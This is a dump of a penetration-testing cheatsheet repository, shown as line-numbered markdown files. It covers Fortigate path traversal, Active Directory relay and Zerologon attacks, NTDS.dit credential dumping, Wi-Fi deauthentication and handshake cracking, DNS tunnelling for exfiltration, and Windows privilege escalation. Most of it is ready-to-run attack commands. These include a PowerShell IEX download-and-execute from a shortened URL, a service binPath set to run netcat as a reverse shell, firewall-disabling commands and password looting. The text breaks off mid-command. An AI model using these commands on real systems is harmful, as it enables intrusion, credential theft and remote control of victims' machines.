```bash 201 | run script post-merge https://docs.gitlab.com/ee/administration/custom_hooks.html .git/hooks 202 | ``` 203 | 204 | --- 205 | 206 | ## **Stormshield** 207 | 208 | - [test for default password](https://github.com/jenaye/netasq-1300) 209 | 210 | [Stormshield Documentation](https://documentation.stormshield.eu/SNS/v3/fr/Content/CLI_Serverd_Commands_reference_Guide_v3/Introduction.htm) 211 | ```bash 212 | # Check default password : \(UpdatePasswd=1 if factory password, 0 if the password already have been changed\) 213 | CHPWD 101 code=00a01000 msg="Begin" format="section" \[Result\] UpdatePasswd=0 214 | ``` 215 | 216 | --- 217 | 218 | ## **Fortigate** 219 | 220 | - [CVE-2018-13379](https://www.exploit-db.com/exploits/47288) 221 | 222 | ```sh 223 | /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 224 | ``` 225 | 226 | --- 227 | 228 | ## **Dana** 229 | 230 | ```bash 231 | https://XXXX/dana-na/setup/psalinstall.cgi 232 | ``` 233 | 234 | ## **SSL / TLS** 235 | 236 | * [testssh.sh](https://github.com/drwetter/testssl.sh) 237 | 238 | Openssl 239 | 240 | ```bash 241 | openssl s_client -cipher BEAST -connect :443 242 | openssl s_client -connect :443 -ssl3 243 | 244 | # Expiration date 245 | openssl s_client -connect :443 | openssl x509 -noout -dates 246 | ``` 247 | 248 | Check Heartbleed 249 | 250 | ```bash 251 | cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done 252 | ``` 253 | 254 | Check lucky13 255 | 256 | ```bash 257 | openssl s_client -cipher DES-CBC3-SHA -connect xx.fr:443 258 | ``` 259 | 260 | --- 261 | 262 | ## **Android** 263 | 264 | Apktool 265 | 266 | ```bash 267 | apktool d app_name.apk 268 | ``` 269 | 270 | Extract sensitive info 271 | 272 | ```bash 273 | grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/ 274 | ``` 275 | -------------------------------------------------------------------------------- /Cheatsheets/internal/01-internal-global.md: -------------------------------------------------------------------------------- 1 | # Internal Penetration Testing 2 | 3 | ## 1. **No network access** 4 | 5 | ### Wi-Fi 6 | 7 | * Crack WPA or crack/replay PEAP 8 | 9 | > For more details, see next cheatsheet : [WiFi](02-wifi.md) 10 | 11 | ### NAC - MAC filtering 12 | 13 | 1. Spoof mac, static ip, gateway ip, from any authorized device \(e.g printer or voip phone\), and disconnect it: 14 | ```sh 15 | macchanger -m [MAC] [Interface] 16 | ``` 17 | 2. force your static IP to match the one that you spoofed the mac from : 18 | ```sh 19 | sudo ifconfig /24 && sudo ip route add default via 20 | ``` 21 | 22 | ### NAC - 802.1X 23 | 24 | * [Fenrir](https://github.com/Orange-Cyberdefense/fenrir-ocd) (IEEE 802.1X bypass) 25 | 26 | --- 27 | 28 | ## 2. **No account yet** 29 | 30 | ### Coerce (Null session) 31 | 32 | `wget https://gist.githubusercontent.com/zblurx/99fe1971562593fd1211931bdc979fbb/raw/6e18ba3b0694303d6eca3fda8505cf800ef83540/esc8fuzzer.py` 33 | 34 | then `esc8fuzzer.py ` 35 | 36 | This will check if esc8 vulnerability is available or not 37 | 38 | if yes, you can just create relay and steal pfx certificate 39 | 40 | `certipy relay -ca -template 'Domaincontroller'` 41 | after run 42 | 43 | `petitPotam.py -d ` to get pfx then 44 | 45 | `certipy auth -pfx administrator.pfx -dc-ip ` 46 | 47 | export KRB5CCNAME=/workspace/administrator.ccache 48 | `secretsdump -k -no-pass /'administrator$'@administrator.` 49 | 50 | It's also possible to make the relay using this command 51 | > `ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs --template DomainController` 52 | 53 | but you have to use `gettgtpkinit.py -pfx-base64 ${cat cert.base64} ''/administrator$'@administrator.` to have the TGT 54 | 55 | 56 | ### Physical access 57 | 58 | Boot from Kali Linux and dump creds 59 | 60 | ```bash 61 | fdisk -l 62 | mount /dev/ /mnt 63 | cd /mnt/Windows/system32/Config 64 | impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY -local 65 | ``` 66 | > For more details, see next cheatsheet : [Windows Post Exploitation](05-post-exploitation-windows.md) 67 | 68 | --- 69 | 70 | ### Network Access 71 | 72 | **Get-DC-IP** 73 | 74 | ``` 75 | nslookup -type=ANY _ldap._tcp.dc._msdcs. 76 | nslookup gc._msdcs. 77 | ``` 78 | 79 | With [DC Detector](https://github.com/noraj/dcdetector) 80 | 81 | ``` 82 | dcd -d 83 | ``` 84 | 85 | **Man-In-The-Middle** 86 | 87 | Responder + NTLMrelayx 88 | 89 | ```bash 90 | # 1. First we need to edit responder.conf : 91 | sudo vim /usr/share/responder/Responder.conf 92 | SMB = Off # Turn this off 93 | HTTP = Off # Turn this off 94 | 95 | # 2. Then we create a list of targets : 96 | ## For small range 97 | crackmapexec smb --gen-relay-list relaylistOutputFilename.txt 98 | ## For big range 99 | nmap -T4 -Pn -p 445 --open -oA 100 | cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u > perim_up_smb.txt 101 | crackmapexec smb perim_up_smb.txt --gen-relay-list relaylistOutputFilename.txt 102 | 103 | # 3. After we can run ntlmrelayx 104 | impacket-ntlmrelayx -tf relaylistOutputFilename.txt -smb2support --output-file relayed-hash.txt 105 | 106 | also : 107 | 108 | impacket-ntlmrelayx -tf relaylistOutputFilename.txt -socks -smb2support --output-file relayed-hash-with-socks.txt 109 | # if you get socks 110 | # [*] Authenticating against smb://192.168.1.3 as \ SUCCEED 111 | # [*] SOCKS: Adding /@192.168.1.3(445) to active SOCKS connection. Enjoy 112 | # you can do this : `proxychains smbclient.py -no-pass /@` 113 | # make sure /etc/proxychains.conf is set to 1080 114 | 115 | # 4. Finally, using another shell, we can run Responder 116 | ## Light 117 | ./Responder.py -I eth0 118 | ## Medium (enable wpad, netbios domain and wredir suffix queries) 119 | ./Responder.py -I eth0 -dw 120 | ## Full (Force WPAD and ProxyAuth) 121 | ./Responder.py -I eth0 -dwFP 122 | ``` 123 | 124 | > If limited to a Windows system, you can use Inveigh instead of Responder : 125 | - [Inveigh](https://github.com/Kevin-Robertson/Inveigh) 126 | 127 | 128 | mitm6 + NTLMrelayx 129 | 130 | ```bash 131 | sudo mitm6 -d --ignore-nofqdn 132 | impacket-ntlmrelayx -tf relaylistOutputFilename.txt -6 --output-file relayed-hash.txt 133 | 134 | # If no smb available, try ldap/ldaps/mssql : 135 | impacket-ntlmrelayx -t ldaps:// -l lootdir 136 | ``` 137 | 138 | ARP \(use with caution !\) 139 | 140 | ```bash 141 | Bettercap 142 | Cain.exe (& Abel) 143 | ``` 144 | 145 | 146 | **Zerologon** 147 | 148 | ``` 149 | zerologon-exploit '' '' 150 | 151 | secretsdump -just-dc -no-pass \$@ 152 | 153 | #Get hexpass of machine account 154 | secretsdump -hashes :'' ''/'Administrator'@'' 155 | 156 | # Use hexpess to restore 157 | zerologon-restore ''/''@'' -target-ip '' -hexpass 'xxx' 158 | ``` 159 | 160 | --- 161 | 162 | **Port and service scan** 163 | 164 | Hosts discovery from huge ranges 165 | 166 | 167 | masscan on a single port 168 | 169 | `masscan -p 445 --rate=10000 | cut -d ' ' -f 6 >> 445-open.txt` 170 | 171 | zmap on a single port (linux and windows) 172 | 173 | ```bash 174 | sudo apt install zmap && sudo rm /etc/zmap/blacklist.conf && sudo touch /etc/zmap/blacklist.conf 175 | sudo zmap -p22 10.0.0.0/8 192.168.0.0/16 -o zmap_linux.ips 176 | sudo zmap -p445 10.0.0.0/8 192.168.0.0/16 -o zmap_windows.ips 177 | ``` 178 | 179 | masscan on identified ranges 180 | 181 | ```bash 182 | cat zmap_*.ips |awk -F. '{print $1"."$2"."$3".0/24"}' |sort -u > masscan_targets.ips 183 | masscan -iL masscan_targets.ips -p 21,22,23,80,443,445,5985,5986,8080,8443,5900 -oG masscan.grep 184 | 185 | ``` 186 | 187 | nmap on identified hosts 188 | 189 | ```bash 190 | nmap -sV --version-all -Pn -sT --top-ports 3000 -iL masscan.grep -oA all_hosts 191 | nmap --version-all -sV -sC -p- -oA allports 192 | ``` 193 | 194 | Search for low hanging fruits \(MS17 / default password TOMCAT VNC ... \) 195 | 196 | ```bash 197 | nmap -Pn -n -sSUV -n -vvv --reason -pT:137-139,445,U:137-139 --script=*ms17-010* -oA SMB_MS17 198 | use auxiliary/scanner/smb/smb_ms17_010 199 | use auxiliary/scanner/mssql/mssql_login 200 | use auxiliary/scanner/http/tomcat_mgr_login 201 | searchsploit 202 | ``` 203 | 204 | > For more details, see previous cheatsheet : [External Penetration Testing](../external/01-web-global.md) 205 | 206 | --- 207 | 208 | 209 | ## 3. **Unprivileged account only** 210 | 211 | 212 | ### Looking for coerced authentications 213 | 214 | 215 | 216 | **coerce list** 217 | 218 | ``` 219 | esc1 => abuse of a template-based vulnerability 220 | esc4 => abuse of a generic write (ACL) based vulnerability 221 | esc6 => abuse of vulnerability based on CA 222 | esc8 => relayx ntlm (attack can be played both with and without account) 223 | ``` 224 | 225 | **How to list all coerce of target** 226 | 227 | 228 | ``` 229 | git clone https://github.com/p0dalirius/Coercer.git 230 | cd Coercer && make 231 | ./Coercer.py -d '' -u '' -p '' --listener 232 | 233 | 234 | #OtherWay 235 | 236 | rpcdump.py DC02. | grep -A 6 MS-RPRN 237 | impacket-rpcdump | grep -A6 spool 238 | ``` 239 | 240 | **esc8** 241 | 242 | >If you don't know the IP of ADCS serveur, please use `certipy find /:@` 243 | 244 | ``` 245 | certipy relay -ca -template 'Domaincontroller' 246 | OR 247 | ntlmrelayx.py -t http:///certsrv/certfnsh.asp --smb2support --adcs 248 | 249 | And after 250 | 251 | PetitPotam -u '' -p '' -d 252 | 253 | Now we have .pfx, we can use it to get ticket service and nt hashs of computer account 254 | ``` 255 | 256 | 257 | **How to use pfx file** 258 | 259 | `certipy auth -pfx certif.pfx -dc-ip -username -domain ` 260 | 261 | This will give you .ccache file wich contain TGT and other certify will also show you a NT hash 262 | 263 | If you want to use the TGT with crackmapexec you can do it like this : 264 | 265 | `export KRB5CCNAME=administrator.ccache; cme smb DC01. -u 'administrator' -d -k` 266 | 267 | but you'll not be local administrator, but you can be using these commands which use dcsync: 268 | 269 | ``` 270 | export KRB5CCNAME=/workspace/administrator.ccache 271 | secretsdump -k -no-pass /'administrator$'@administrator. 272 | ``` 273 | 274 | In case of secretsdump isn't working, we recommend you to create silver ticket( which is available only on the pwned machine and the pwned service ) 275 | 276 | 277 | **How to create silver ticket** 278 | 279 | 280 | ``` 281 | # Find the SID domain 282 | lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0 283 | 284 | # with an NT hash 285 | python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username 286 | 287 | ``` 288 | 289 | you will get a service ticket, which allows you to root the machine then dump SAM and LSA ( also don't forget to use lsassy, you can have some good surprise) 290 | 291 | 292 | 293 | ### Get a shell 294 | 295 | > For more details, see next cheatsheets : [Shell](../useful-commands/shell.md) and [AV Bypass](09-antivirus-bypass) 296 | 297 | --- 298 | 299 | ### Local Privilege Escalation 300 | 301 | > For more details, see next cheatsheet : [Local Privilege Escalation Windows](03-lpe-windows.md) 302 | 303 | --- 304 | 305 | ### Domain Escalation 306 | 307 | > For more details, see next cheatsheet : [Domain Escalation](08-domain-escalation.md) 308 | 309 | --- 310 | 311 | ## 4. **Local Admin account** 312 | 313 | ### Post-Exploitation 314 | 315 | > For more details, see next cheatsheet : [Local Post Exploitation Windows](05-post-exploitation-windows.md) 316 | 317 | ### Pivoting 318 | 319 | > For more details, see next cheatsheet : [Pivoting](07-pivoting.md) 320 | 321 | ### Replay the secrets found 322 | 323 | Kerberos ticket, LM/NTLM hash or cleartext password with CrackMapExec or lsassy 324 | 325 | ```bash 326 | crackmapexec smb -d -u -H --lsa 327 | crackmapexec smb -d -u -H --sam 328 | crackmapexec smb -d -u -H -M lsassy 329 | lsassy -d -u -p 330 | ``` 331 | 332 | --- 333 | 334 | ## 5. **Domain admin account** 335 | 336 | ### Dump NTDS.dit from DC 337 | 338 | ```bash 339 | # CrackMapExec using password 340 | sudo crackmapexec smb -u -p '' --ntds 341 | 342 | # CrackMapExec using kerberos ticket 343 | export KRB5CCNAME=.ccache 344 | sudo crackmapexec smb --kerberos --ntds drsuapi 345 | 346 | # Antivirus blocking default drsuapi method, try vss method instead 347 | sudo crackmapexec smb -u -p '' --ntds vss 348 | 349 | # dump krbgt hash only 350 | impacket-secretsdump /:''@ -history -just-dc -just-user krbgt 351 | ``` 352 | 353 | ### Manual Dump 354 | 355 | ```bash 356 | # 1) use any tool that can achieve command execution on remote target to make a shadow copy 357 | vssadmin create shadow /for=C: 358 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\NTDS.dit.bak 359 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\SYSTEM.bak 360 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Windows\SECURITY.bak 361 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\SAM.bak 362 | 363 | # 2) use any tool that can retrieve these 4 files 364 | smbmap -d -u -p -H --download-file 'C:\Windows\NTDS.dit.bak' 365 | smbmap -d -u -p -H --download-file 'C:\Windows\SYSTEM.bak' 366 | smbmap -d -u -p -H --download-file 'C:\Windows\SECURITY.bak' 367 | smbmap -d -u -p -H --download-file 'C:\Windows\SAM.bak' 368 | 369 | # 3) Locally parse theses files 370 | impacket-secretsdump -ntds NTDS.dit.bak -system SYSTEM.bak -security SECURITY.bak -sam SAM.bak LOCAL 371 | ``` 372 | 373 | -------------------------------------------------------------------------------- /Cheatsheets/internal/02-wifi.md: -------------------------------------------------------------------------------- 1 | # WIFI 2 | 3 | ## **WPA** 4 | 5 | 1. Capture Handshake using airodump-ng 6 | 2. Crack it locally using john or hashcat 7 | 8 | ### 1. Monitor mode 9 | 10 | ```sh 11 | sudo airmon-ng start wlan0 12 | ``` 13 | 14 | ### 2. Listen for specific bssid 15 | 16 | ```sh 17 | sudo airodump-ng -a mon0 18 | ``` 19 | 20 | > find you target bssid \(mac\) and chanel 21 | 22 | ```sh 23 | airodump-ng -c --bssid --showack -w capture mon0 24 | ``` 25 | 26 | > don't forget the -w paramter to save the handshake ! 27 | 28 | ### 3. DeAUTH 29 | 30 | ```sh 31 | # DEAUTH all clients from a box 32 | aireplay-ng mon0 -0 5 -b 33 | 34 | # DEAUTH specific client device 35 | aireplay-ng mon0 -0 5 -a -c 36 | 37 | 38 | # DEAUTH massif (each client connected at each bssid of an essid) 39 | for bssid in cat bssid_deauth.lst; do for mac in cat client_deauth.lst; do aireplay-ng mon.wlan0 -0 5 -a $bssid -c $mac --ignore-negative-one -e ; done ; done 40 | 41 | ``` 42 | 43 | ### 4. Handshake cracking 44 | 45 | Handshaked captured ? go crack it ! 46 | 47 | Crack with aircrack 48 | 49 | ```sh 50 | aircrack-ng capture-01.cap --wordlist= 51 | ``` 52 | 53 | Crack with john 54 | 55 | ```bash 56 | wpaclean capture.cap-01.clean.cap capture.cap-01.cap 57 | aircrack-ng capture.cap-01.clean.cap -J capture.cap-01.hccap 58 | hccap2john capture.cap-01.hccap > capture.cap-01.hccap.john 59 | john --wordlist= capture.cap-01.hccap.john 60 | ``` 61 | 62 | Crack with hashcat 63 | 64 | ```sh 65 | todo 66 | ``` 67 | 68 | --- 69 | 70 | ## **PEAP** 71 | 72 | 1. `sudo apt install hostapd-wpe` 73 | 2. Configure same channel and essid than the client's one in hostapd conf 74 | 3. Disconnect clients devices \(see WPA - 3. DeAUTH\) 75 | 76 | Log PEAP : hash client format john 77 | 78 | ```sh 79 | cat peap_client_log.txt | grep username -A2 | sed '/^--/d' | awk '{print $2}' | tr -d ':' | awk 'NR%3{printf $0":";next;}1' | awk -F ':' '{print $1"::::"$3":"$2}' 80 | ``` 81 | 82 | > Vulnerability fix : GPO validate certificate 83 | 84 | --- 85 | 86 | ## **Captive portal** 87 | 88 | ### DNS tunneling 89 | 90 | Try DNS tunneling to exfiltrate data over the internet 91 | 92 | - [http://requestbin.net/dns](http://requestbin.net/dns) 93 | 94 | - [dnscat2](https://github.com/iagox86/dnscat2) 95 | 96 | ```sh 97 | git clone https://github.com/iagox86/dnscat2.git 98 | cd dnscat2/server/ 99 | bundle install 100 | ``` 101 | 102 | ## Troubleshooting 103 | 104 | ### unblock wifi card 105 | 106 | ```bash 107 | sudo nmcli nm wifi off 108 | sudo nmcli radio wifi off 109 | sudo rfkill unblock wlan 110 | ``` 111 | 112 | --- 113 | 114 | ## **Todo** 115 | 116 | ### PEAP hash replay 117 | 118 | * Spoof AP and replay hashed captured 119 | * [Sensepost berate_ap](https://github.com/sensepost/berate_ap) 120 | * [Sensepost sycophant](https://github.com/sensepost/wpa_sycophant) 121 | 122 | ### dns2tcp manually 123 | 124 | création du tunel 125 | 126 | ```sh 127 | dns2tcpc -z dnstun.lexsi.net -c -d 1 -l 9000 -r ssh 192.168.128.27 -k _bijour@lexsi_ dns2tcpc -z dnstun.lexsi.net -c -d 1 -l 9000 -r ssh 192.168.1.29 -k Q5xTEGHgqa8 ssh rsshdummy@127.0.0.1 -p 9000 -D 9010 -N -i rssh\_dummy\_dv\_new 128 | ``` 129 | 130 | mise en place du proxy local 131 | 132 | ```sh 133 | ssh rssh@127.0.0.1 -p 9000 -D 9010 -N -i rssh.ssh 134 | ``` 135 | 136 | ### WPS 137 | 138 | ```bash 139 | airmon-ng check airmon-ng start wlan1 140 | wifite --showb --wpa --mon-iface wlan0mo 141 | airodump-ng -a wlan1mon --wps --essid-regex EDL time reaver -i wlan1mon -c 1 -b E8:FC:AF:9A:C9:B0 -K 1 142 | airodump-ng -a wlan1mon --essid-regex Internet 143 | wifite --showb --wpa --mon-iface wlan0mon --aircrack --pyrit --tshark --cowpatty --power 40 144 | airmon-ng check airmon-ng start wlan0 145 | airodump-ng wlan0mon --wps --essid-regex VICTIM reaver -i wlan0mon -c $channel -b $bssid -K 1 146 | ``` -------------------------------------------------------------------------------- /Cheatsheets/internal/03-lpe-windows.md: -------------------------------------------------------------------------------- 1 | # Priv-Esc Windows 2 | 3 | ## **Tools** 4 | 5 | DOTNET CSHARP 6 | 7 | * [SharpCollection](https://github.com/Flangvik/SharpCollection) (Flangvik collection of compiled WinPEAS, SeatBelt, SharpUP, etc.) 8 | * [winPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (Favorite so far) 9 | * [Seatbelt](https://github.com/GhostPack/Seatbelt) 10 | * [SharpUp](https://github.com/GhostPack/SharpUp) 11 | * [Rubeus](https://github.com/GhostPack/Rubeus) (Kerberos exploitation) 12 | * [Watson](https://github.com/rasta-mouse/Watson) (Kernel Exploitation) 13 | 14 | POWERSHELL 15 | 16 | * [JAWS](https://github.com/411Hall/JAWS) 17 | * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) (PowerUp) 18 | * [Sherlock](https://github.com/rasta-mouse/Sherlock) (Kernel Exploitation - Depreciated, now use Watson) 19 | * [WindowsEnum](https://github.com/absolomb/WindowsEnum) 20 | 21 | EXE CLASSIC 22 | 23 | * [Powerless](https://github.com/M4ximuss/Powerless) 24 | * [BeRoot](https://github.com/AlessandroZ/BeRoot) 25 | * [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check) 26 | * [WindowsExploits](https://github.com/abatchy17/WindowsExploits) 27 | 28 | --- 29 | 30 | ## **Basic info** 31 | 32 | ### System enumeration 33 | 34 | OS name, arch, and version 35 | 36 | ```bat 37 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 38 | 39 | wmic os get lastbootuptime 40 | wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 41 | 42 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" 43 | 44 | hostname 45 | C:\WINDOWS\System32\drivers\etc\hosts 46 | ``` 47 | 48 | List all env variables 49 | 50 | ```bat 51 | Get-ChildItem Env: | ft Key,Value 52 | ``` 53 | 54 | Find Writeable Folder 55 | 56 | ```bat 57 | echo %temp% 58 | echo %tmp% 59 | ``` 60 | 61 | List all drives 62 | 63 | ```bat 64 | wmic logicaldisk get caption || fsutil fsinfo drives 65 | wmic logicaldisk get caption,description,providername 66 | 67 | Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root 68 | ``` 69 | 70 | --- 71 | 72 | ### User enumeration 73 | 74 | Get current username 75 | 76 | ```bat 77 | echo %USERNAME% || whoami 78 | $env:username 79 | ``` 80 | 81 | List user privilege 82 | 83 | ```bat 84 | whoami /priv 85 | whoami /groups 86 | ``` 87 | 88 | List all users 89 | 90 | ```bat 91 | qwinsta (can be run on remote `qwinsta [/server:]`) 92 | net user 93 | whoami /all 94 | 95 | Get-LocalUser | ft Name,Enabled,LastLogon 96 | Get-ChildItem C:\Users -Force | select Name 97 | ``` 98 | 99 | List logon requirements; useable for bruteforcing 100 | 101 | ```bat 102 | net accounts 103 | ``` 104 | 105 | Get details about a user \(i.e. administrator, admin, current user\) 106 | 107 | ```bat 108 | net user administrator 109 | net user admin 110 | net user %USERNAME% 111 | ``` 112 | 113 | List all local groups 114 | 115 | ```bat 116 | net localgroup 117 | 118 | Get-LocalGroup | ft Name 119 | ``` 120 | 121 | Get details about a group \(i.e. administrators\) 122 | 123 | ```bat 124 | net localgroup administrators 125 | 126 | Get-LocalGroupMember Administrators | ft Name, PrincipalSource 127 | Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource 128 | 129 | ``` 130 | 131 | --- 132 | 133 | ### Network enumeration 134 | 135 | List all network interfaces, IP, and DNS. 136 | 137 | ```bat 138 | ipconfig /all 139 | 140 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 141 | Get-DnsClientServerAddress -AddressFamily IPv4 | ft 142 | ``` 143 | 144 | List current routing table 145 | 146 | ```bat 147 | route print 148 | 149 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 150 | ``` 151 | 152 | List the ARP table 153 | 154 | ```bat 155 | arp -A 156 | 157 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 158 | ``` 159 | 160 | List all current connections 161 | 162 | ```bat 163 | netstat -ano 164 | ``` 165 | 166 | List firewall state and current configuration 167 | 168 | ```bat 169 | netsh advfirewall firewall dump 170 | 171 | netsh advfirewall firewall show rule name=all 172 | netsh advfirewall export "firewall.txt" 173 | 174 | netsh firewall show state 175 | netsh firewall show config 176 | ``` 177 | 178 | List firewall's blocked ports 179 | 180 | ```bat 181 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 182 | ``` 183 | 184 | Disable firewall 185 | 186 | ```bat 187 | netsh firewall set opmode disable 188 | netsh advfirewall set allprofiles state off 189 | ``` 190 | 191 | List all network shares 192 | 193 | ```bat 194 | net share 195 | ``` 196 | 197 | SNMP Configuration 198 | 199 | ```bat 200 | reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 201 | Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse 202 | ``` 203 | 204 | --- 205 | 206 | ## **Password looting** 207 | 208 | ### Tools 209 | 210 | ```bat 211 | - Seatbelt.exe 212 | 213 | - PowerSploit 214 | Get-CachedGPPPassword //For locally stored GP Files 215 | Get-GPPPassword //For GP Files stored in the DC 216 | Get-UnattendedInstallFile 217 | Get-Webconfig 218 | Get-ApplicationHost 219 | Get-SiteListPassword 220 | Get-RegistryAutoLogon 221 | 222 | - msf 223 | post/windows/gather/credentials/gpp 224 | ``` 225 | 226 | ### Group Policy Preferences 227 | 228 | ```bat 229 | dir C:\ProgramData\Microsoft\Group Policy\History\\Machine\Preferences\Groups\Groups.xml 230 | dir \\\SYSVOL\\Policies\\MACHINE\Preferences\Groups\Groups.xml 231 | 232 | Services\Services.xml 233 | ScheduledTasks\ScheduledTasks.xml 234 | Printers\Printers.xml 235 | Drives\Drives.xml 236 | DataSources\DataSources.xml 237 | ``` 238 | 239 | ### Unattended Install files 240 | 241 | ```bat 242 | dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul 243 | 244 | Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} 245 | 246 | C:\Windows\Panther\Unattend.xml 247 | C:\Windows\Panther\Unattended.xml 248 | C:\Windows\Panther\Unattend\Unattended.xml 249 | C:\Windows\Panther\Unattend\Unattend.xml 250 | C:\Windows\System32\Sysprep\unattend.xml 251 | C:\Windows\System32\Sysprep\Panther\unattend.xml 252 | ``` 253 | 254 | ### Credential manager 255 | 256 | ```bat 257 | cmdkey /list 258 | dir C:\Users\username\AppData\Local\Microsoft\Credentials\ 259 | dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 260 | 261 | Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ 262 | Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 263 | ``` 264 | 265 | ### In file name 266 | 267 | ```bat 268 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 269 | where /R C:\ user.txt 270 | where /R C:\ *.ini 271 | 272 | Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" 273 | ``` 274 | 275 | ### In file content 276 | 277 | ```bat 278 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 279 | findstr /si password *.xml *.ini *.txt *.config 2>nul 280 | findstr /spin "password" *.* 2>nul 281 | dir /s *pass* == *vnc* == *.config* 2>nul (lot of output) 282 | 283 | Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue 284 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue 285 | 286 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 287 | C:\inetpub\wwwroot\web.config 288 | ``` 289 | 290 | ### In registry 291 | 292 | ```bat 293 | REG QUERY HKLM /F "password" /t REG_SZ /S /K 294 | REG QUERY HKCU /F "password" /t REG_SZ /S /K 295 | reg query HKLM /f password /t REG_SZ /s 296 | reg query HKCU /f password /t REG_SZ /s 297 | 298 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin 299 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 300 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters 301 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials 302 | reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials 303 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 304 | 305 | 306 | REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList 307 | 308 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*" 309 | ``` 310 | 311 | ### In services 312 | 313 | ```bat 314 | https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 315 | Import-Module \SessionGopher.ps1; 316 | Invoke-SessionGopher -AllDomain -o 317 | Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss 318 | ``` 319 | > Full path is mandatory for Import-Module 320 | 321 | ### in Powershell history 322 | 323 | ```bat 324 | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 325 | type C:\Users\\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 326 | type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 327 | 328 | cat (Get-PSReadlineOption).HistorySavePath 329 | cat (Get-PSReadlineOption).HistorySavePath | sls passw 330 | ``` 331 | 332 | --- 333 | 334 | ## **Services** 335 | 336 | ### Tools 337 | 338 | ```bat 339 | - SeatBelt.exe 340 | 341 | - SharpUp.exe 342 | 343 | - PowerSploit 344 | Get-ServiceDetail 345 | Get-ModifiableService | more 346 | Get-ModifiableServiceFile | more 347 | Write-ServiceBinary 348 | 349 | - PowerUp 350 | powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" 351 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/DFgdfez'); Invoke-AllChecks" 352 | Invoke-ServiceAbuse -Name -Username 353 | ``` 354 | 355 | ### Manual exploit Binary Path 356 | 357 | Change binary path name 358 | 359 | ```bash 360 | sc config "snmptrap" binPath= "net localgroup administrators /add" 361 | ``` 362 | 363 | > Tested on Windows XP SP1 364 | 365 | ```bat 366 | sc qc upnphost 367 | sc config SSDPSRV start= auto 368 | net start SSDPSRV 369 | sc config upnphost binpath= "C:\nc.exe -nv [ip] [port] -e C:\WINDOWS\System32\cmd.exe" 370 | sc config upnphost obj= ".\LocalSystem" password= "" 371 | sc qc 